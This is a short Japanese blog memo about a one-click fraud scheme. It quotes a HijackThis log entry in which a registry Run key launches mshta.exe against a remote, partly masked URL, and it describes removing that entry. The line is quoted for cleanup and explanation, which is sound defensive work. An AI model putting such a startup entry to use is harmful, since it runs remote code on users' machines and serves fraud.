【ウイルス】HTAファイルを利用したワンクリ詐欺サイト【備忘録】
皆様こんにちは、ボタンがあったら即押したい、海があったら釣りしたい、穴があったら入りたい、けーすけで、御座います。
如何お過ごしでしょうか。
久し振りにイイ生ログが採取出来たから備忘録。
昆虫採集の時期ですなぁ。
HijackThisのログに見事にエントリ出ますね。
不正なワンクリ詐欺のポップアップ出るケース。
O4 – HKCU\..\Run: [Skyae9564_5403404] "C:\WINDOWS\system32\mshta.exe" "http://****.movie109.info/dkbpl/GV0eaZ8l9jTPyeG3b8Pf5g.jsp"
HijackThisのスキャンで上記エントリをFix。mshta.exeのプロセスを停止して再起動で対応終了のようだ。
mshta.exeファイル自体は普通のMSの正規ファイルなのでファイルはそのまま。
なかなか見事だね、これ。
ディスカッション
コメント一覧
なにっ!穴があったら入れたいとな!!!
何故バレたし?!ww
バレた???ってか入力ミスかと!!!
あなたなら、当然!
フォッフォッフォ
くるしゅうない